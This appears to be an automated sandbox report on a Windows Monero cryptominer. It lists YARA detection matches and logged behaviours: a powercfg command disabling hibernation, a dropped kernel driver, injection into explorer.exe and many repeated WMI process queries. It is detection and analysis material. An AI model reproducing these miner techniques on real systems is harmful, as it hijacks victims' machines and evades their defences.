                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: Process Memory Space: mfpmikspvfzi.exe PID: 7108, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Uses powercfg.exe to modify the power settings
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\System32\conhost.exeCode function: 56_2_0000000140001394 NtQueryAttributesFile,56_2_0000000140001394
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeFile created: C:\Windows\TEMP\amhsyemgqpki.sysJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_mbxbqitq.scx.ps1Jump to behavior
                  Source: C:\Windows\System32\conhost.exeCode function: 56_2_000000014000315056_2_0000000140003150
                  Source: C:\Windows\System32\conhost.exeCode function: 56_2_00000001400026E056_2_00000001400026E0
                  Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\amhsyemgqpki.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 33.3.mfpmikspvfzi.exe.243209b0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                  Source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                  Source: Process Memory Space: mfpmikspvfzi.exe PID: 7108, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@81/12@2/3
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6784:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2032:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2032:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7136:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6612:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6788:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6908:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6640:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4312:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:560:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6956:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6400:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eiu0pqbk.vqi.ps1Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: nlGOh9K5X5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
